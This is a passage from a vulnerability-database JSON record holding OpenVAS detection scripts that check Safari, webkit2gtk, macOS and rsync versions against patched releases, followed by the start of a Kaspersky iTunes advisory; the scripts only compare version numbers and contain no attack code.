can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nCPE = \"cpe:/a:apple:safari\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817030\");\n script_version(\"2020-06-16T07:17:49+0000\");\n script_cve_id(\"CVE-2020-9801\", \"CVE-2020-9802\", \"CVE-2020-9805\", \"CVE-2020-9800\",\n \"CVE-2020-9806\", \"CVE-2020-9807\", \"CVE-2020-9850\", \"CVE-2020-9843\",\n \"CVE-2020-9803\", \"CVE-2019-20503\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-06-16 07:17:49 +0000 (Tue, 16 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-28 11:33:31 +0530 (Thu, 28 May 2020)\");\n script_name(\"Apple Safari Security Updates(HT211177)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Safari\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An out-of-bounds write/read issue with bounds checking,\n\n - A memory corruption issues input validation\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to execute arbitrary code, gain access to sensitive data, bypass security\n restrictions, and launch denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"Apple Safari versions before 13.1.1\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Safari 13.1.1 or later.\n Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT211177\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"macosx_safari_detect.nasl\");\n script_mandatory_keys(\"AppleSafari/MacOSX/Version\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nsafVer = infos['version'];\nsafPath = infos['location'];\n\nif(version_is_less(version:safVer, test_version:\"13.1.1\"))\n{\n report = report_fixed_ver(installed_version:safVer, fixed_version:\"13.1.1\", install_path:safPath);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-21T20:05:17", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2020-07-18T00:00:00", "type": "openvas", "title": "Debian: Security Advisory for webkit2gtk (DSA-4724-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-9803", "CVE-2020-13753", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9802", "CVE-2020-9850", "CVE-2020-9807", "CVE-2020-9843"], "modified": "2020-07-18T00:00:00", "id": "OPENVAS:1361412562310704724", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704724", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704724\");\n script_version(\"2020-07-18T03:00:12+0000\");\n script_cve_id(\"CVE-2020-13753\", \"CVE-2020-9802\", \"CVE-2020-9803\", \"CVE-2020-9805\", \"CVE-2020-9806\", \"CVE-2020-9807\", \"CVE-2020-9843\", \"CVE-2020-9850\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-07-18 03:00:12 +0000 (Sat, 18 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-07-18 03:00:12 +0000 (Sat, 18 Jul 2020)\");\n script_name(\"Debian: Security Advisory for webkit2gtk (DSA-4724-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB10\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2020/dsa-4724.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4724-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk'\n package(s) announced via the DSA-4724-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The following vulnerabilities have been discovered in the webkit2gtk\nweb engine:\n\nCVE-2020-9802\nSamuel Gross discovered that processing maliciously crafted web\ncontent may lead to arbitrary code execution.\n\nCVE-2020-9803\nWen Xu discovered that processing maliciously crafted web content\nmay lead to arbitrary code execution.\n\nCVE-2020-9805\nAn anonymous researcher discovered that processing maliciously\ncrafted web content may lead to universal cross site scripting.\n\nCVE-2020-9806\nWen Xu discovered that processing maliciously crafted web content\nmay lead to arbitrary code execution.\n\nCVE-2020-9807\nWen Xu discovered that processing maliciously crafted web content\nmay lead to arbitrary code execution.\n\nCVE-2020-9843\nRyan Pickren discovered that processing maliciously crafted web\ncontent may lead to a cross site scripting attack.\n\nCVE-2020-9850\n@jinmo123, @setuid0x0_, and @insu_yun_en discovered that a remote\nattacker may be able to cause arbitrary code execution.\n\nCVE-2020-13753\nMilan Crha discovered that an attacker may be able to execute\ncommands outside the bubblewrap sandbox.\");\n\n script_tag(name:\"affected\", value:\"'webkit2gtk' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the stable distribution (buster), these problems have been fixed in\nversion 2.28.3-2~deb10u1.\n\nWe recommend that you upgrade your webkit2gtk packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"gir1.2-javascriptcoregtk-4.0\", ver:\"2.28.3-2~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"gir1.2-webkit2-4.0\", ver:\"2.28.3-2~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18\", ver:\"2.28.3-2~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-bin\", ver:\"2.28.3-2~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-dev\", ver:\"2.28.3-2~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37\", ver:\"2.28.3-2~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37-gtk2\", ver:\"2.28.3-2~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-dev\", ver:\"2.28.3-2~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-doc\", ver:\"2.28.3-2~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"webkit2gtk-driver\", ver:\"2.28.3-2~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-21T19:27:06", "description": "This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2020-05-27T00:00:00", "type": "openvas", "title": "Apple MacOSX Security Updates(HT211170)-04", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-9822", "CVE-2020-9817", "CVE-2020-9832", "CVE-2020-9834", "CVE-2019-14868", "CVE-2020-9826", "CVE-2020-9812", "CVE-2020-9839", "CVE-2020-9795", "CVE-2020-9813", "CVE-2020-9821", "CVE-2020-9809", "CVE-2020-9790", "CVE-2020-9830", "CVE-2020-9841", "CVE-2020-9833", "CVE-2020-9808", "CVE-2020-9811", "CVE-2019-20044", "CVE-2020-9814", "CVE-2020-9816", "CVE-2020-9789", "CVE-2020-9797", "CVE-2020-9847"], "modified": "2020-07-16T00:00:00", "id": "OPENVAS:1361412562310817133", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817133", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817133\");\n script_version(\"2020-07-16T11:59:37+0000\");\n script_cve_id(\"CVE-2020-9817\", \"CVE-2020-9816\", \"CVE-2020-9830\", \"CVE-2020-9833\",\n \"CVE-2020-9832\", \"CVE-2020-9834\", \"CVE-2020-9811\", \"CVE-2020-9812\",\n \"CVE-2020-9841\", \"CVE-2020-9789\", \"CVE-2020-9790\", \"CVE-2019-20044\",\n \"CVE-2020-9808\", \"CVE-2020-9809\", \"CVE-2020-9847\", \"CVE-2020-9822\",\n \"CVE-2020-9821\", \"CVE-2020-9826\", \"CVE-2020-9797\", \"CVE-2020-9839\",\n \"CVE-2019-14868\", \"CVE-2020-9813\", \"CVE-2020-9814\", \"CVE-2020-9795\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-16 11:59:37 +0000 (Thu, 16 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-27 12:17:06 +0530 (Wed, 27 May 2020)\");\n script_name(\"Apple MacOSX Security Updates(HT211170)-04\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error in permissions issued.\n\n - An out-of-bounds write error.\n\n - A memory initialization error.\n\n - Multiple out-of-bounds read errors.\n\n - Multiple memory corruption issues.\n\n - An error in state management.\n\n - An integer overflow.\n\n - An authorization issue.\n\n - An error in input validation.\n\n - Presence of vulnerable code.\n\n - A race condition.\n\n - An error in the handling of environment variables.\n\n - A logic error resulting in memory corruption.\n\n - A use after free error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers gain root privileges, conduct a denial-of-service, execute arbitrary\n code, read kernel memory, elevate privileges, escape sandbox and gain access to\n sensitive information.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X versions 10.13.x through\n 10.13.6, 10.14.x through 10.14.6 and 10.15.x through 10.15.4\");\n\n script_tag(name:\"solution\", value:\"Apply security update 2020-003 for Apple\n Mac OS X version 10.13.x and 10.14.x, or upgrade to version 10.15.5 or later.\n Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT211170\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"ssh_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || osVer !~ \"^10\\.1[345]\" || \"Mac OS X\" >!< osName)\n exit(0);\n\nbuildVer = get_kb_item(\"ssh/login/osx_build\");\n\nif(osVer =~ \"^10\\.13\")\n{\n if(version_in_range(version:osVer, test_version:\"10.13\", test_version2:\"10.13.5\")){\n fix = \"Upgrade to latest OS release and apply patch from vendor\";\n }\n\n else if(osVer == \"10.13.6\")\n {\n if(osVer == \"10.13.6\" && version_is_less(version:buildVer, test_version:\"17G13033\"))\n {\n fix = \"Apply patch from vendor\";\n osVer = osVer + \" Build \" + buildVer;\n }\n }\n}\n\nelse if(osVer =~ \"^10\\.14\")\n{\n if(version_in_range(version:osVer, test_version:\"10.14\", test_version2:\"10.14.5\")){\n fix = \"Upgrade to latest OS release and apply patch from vendor\";\n }\n\n else if(osVer == \"10.14.6\")\n {\n if(osVer == \"10.14.6\" && version_is_less(version:buildVer, test_version:\"18G5033\"))\n {\n fix = \"Apply patch from vendor\";\n osVer = osVer + \" Build \" + buildVer;\n }\n }\n}\n\nelse if(version_in_range(version:osVer, test_version:\"10.15\", test_version2:\"10.15.4\")) {\n fix = \"10.15.5\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:osVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:27:02", "description": "This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2020-05-27T00:00:00", "type": "openvas", "title": "Apple MacOSX Security Updates(HT211170) - 01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-9827", "CVE-2020-9792", "CVE-2020-9856", "CVE-2020-9791", "CVE-2020-9824", "CVE-2020-9844", "CVE-2020-9852", "CVE-2020-3882", "CVE-2020-3878", "CVE-2020-9804", "CVE-2020-9831", "CVE-2020-9788", "CVE-2020-9815", "CVE-2020-9855", "CVE-2020-9825", "CVE-2020-9851", "CVE-2020-9793", "CVE-2020-9794"], "modified": "2020-07-16T00:00:00", "id": "OPENVAS:1361412562310817130", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817130", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817130\");\n script_version(\"2020-07-16T11:59:37+0000\");\n script_cve_id(\"CVE-2020-9815\", \"CVE-2020-9788\", \"CVE-2020-9831\", \"CVE-2020-9852\",\n \"CVE-2020-9856\", \"CVE-2020-9855\", \"CVE-2020-3882\", \"CVE-2020-9793\",\n \"CVE-2020-9844\", \"CVE-2020-9804\", \"CVE-2020-9791\", \"CVE-2020-9792\",\n \"CVE-2020-9827\", \"CVE-2020-9794\", \"CVE-2020-9824\", \"CVE-2020-9825\",\n \"CVE-2020-9851\", \"CVE-2020-3878\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-16 11:59:37 +0000 (Thu, 16 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-27 12:16:54 +0530 (Wed, 27 May 2020)\");\n script_name(\"Apple MacOSX Security Updates(HT211170) - 01\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple out-of-bounds read errors.\n\n - Insufficient input sanitization.\n\n - An integer overflow.\n\n - Insufficient validation of symlinks.\n\n - A memory corruption issue.\n\n - A double free error.\n\n - A logic issue.\n\n - An error in sandbox restrictions.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, execute arbitrary javascript code, gain access to\n sensitive information, gain elevated privileges, conduct a DoS attck, modify\n restricted network settings and bypass security restrictions.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X versions 10.15.x through 10.15.4\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Mac OS X 10.15.5 or later.\n Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT211170\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"ssh_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || osVer !~ \"^10\\.15\" || \"Mac OS X\" >!< osName)\n exit(0);\n\nif(osVer =~ \"^10\\.15\")\n{\n if(version_in_range(version:osVer, test_version:\"10.15\", test_version2:\"10.15.4\"))\n {\n report = report_fixed_ver(installed_version:osVer, fixed_version:\"10.15.5\");\n security_message(data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:30", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-01-22T00:00:00", "type": "openvas", "title": "Ubuntu Update for rsync USN-2879-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9512"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842614", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842614", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for rsync USN-2879-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842614\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-22 06:07:28 +0100 (Fri, 22 Jan 2016)\");\n script_cve_id(\"CVE-2014-9512\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for rsync USN-2879-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rsync'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that rsync incorrectly\n handled invalid filenames. A malicious server could use this issue to write\n files outside of the intended destination directory.\");\n script_tag(name:\"affected\", value:\"rsync on Ubuntu 15.10,\n Ubuntu 15.04,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2879-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2879-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(15\\.04|14\\.04 LTS|12\\.04 LTS|15\\.10)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU15.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"rsync\", ver:\"3.1.1-3ubuntu0.15.04.1\", rls:\"UBUNTU15.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"rsync\", ver:\"3.1.0-2ubuntu0.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"rsync\", ver:\"3.0.9-1ubuntu1.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU15.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"rsync\", ver:\"3.1.1-3ubuntu0.15.10.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-07-21T19:27:02", "description": "This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2020-05-27T00:00:00", "type": "openvas", "title": "Apple MacOSX Security Updates(HT211170)-02", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-9837", "CVE-2020-9842"], "modified": "2020-07-16T00:00:00", "id": "OPENVAS:1361412562310817131", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817131", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817131\");\n script_version(\"2020-07-16T11:59:37+0000\");\n script_cve_id(\"CVE-2020-9837\", \"CVE-2020-9842\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-07-16 11:59:37 +0000 (Thu, 16 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-27 12:16:58 +0530 (Wed, 27 May 2020)\");\n script_name(\"Apple MacOSX Security Updates(HT211170)-02\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An out-of-bounds read error.\n\n - An entitlement parsing issue.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to leak memory, access private information and perform privileged\n actions.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X versions 10.13.x through\n 10.13.6, 10.15.x through 10.15.4\");\n\n script_tag(name:\"solution\", value:\"Apply security update 2020-003 for Apple Mac OS X\n version 10.13.x or upgrade to version 10.15.5 or later. Please see the references\n for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT211170\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"ssh_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || osVer !~ \"^10\\.1[35]\" || \"Mac OS X\" >!< osName){\n exit(0);\n}\n\nbuildVer = get_kb_item(\"ssh/login/osx_build\");\n\nif(osVer =~ \"^10\\.13\")\n{\n if(version_in_range(version:osVer, test_version:\"10.13\", test_version2:\"10.13.5\")){\n fix = \"Upgrade to latest OS release and apply patch from vendor\";\n }\n\n else if(osVer == \"10.13.6\")\n {\n if(osVer == \"10.13.6\" && version_is_less(version:buildVer, test_version:\"17G13033\"))\n {\n fix = \"Apply patch from vendor\";\n osVer = osVer + \" Build \" + buildVer;\n }\n }\n}\n\nelse if(version_in_range(version:osVer, test_version:\"10.15\", test_version2:\"10.15.4\")) {\n fix = \"10.15.5\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:osVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "kaspersky": [{"lastseen": "2023-11-28T16:57:31", "description": "### *Detect date*:\n05/21/2020\n\n### *Severity*:\nWarning\n\n### *Description*:\nMultiple vulnerabilities were found in Apple iTunes. Malicious users can exploit these vulnerabilities to execute arbitrary code, perform cross-site scripting attack, obtain sensitive information, cause denial of service.\n\n### *Exploitation*:\nPublic exploits exist for this vulnerability.\n\n### *Affected products*:\nApple iTunes earlier than 12.10.7\n\n### *Solution*:\nUpdate to the latest version \n[Download iTunes](<https://www.apple.com/itunes/download/>)\n\n### *Original advisories*:\n[About the security content of iTunes 12.10.7 for 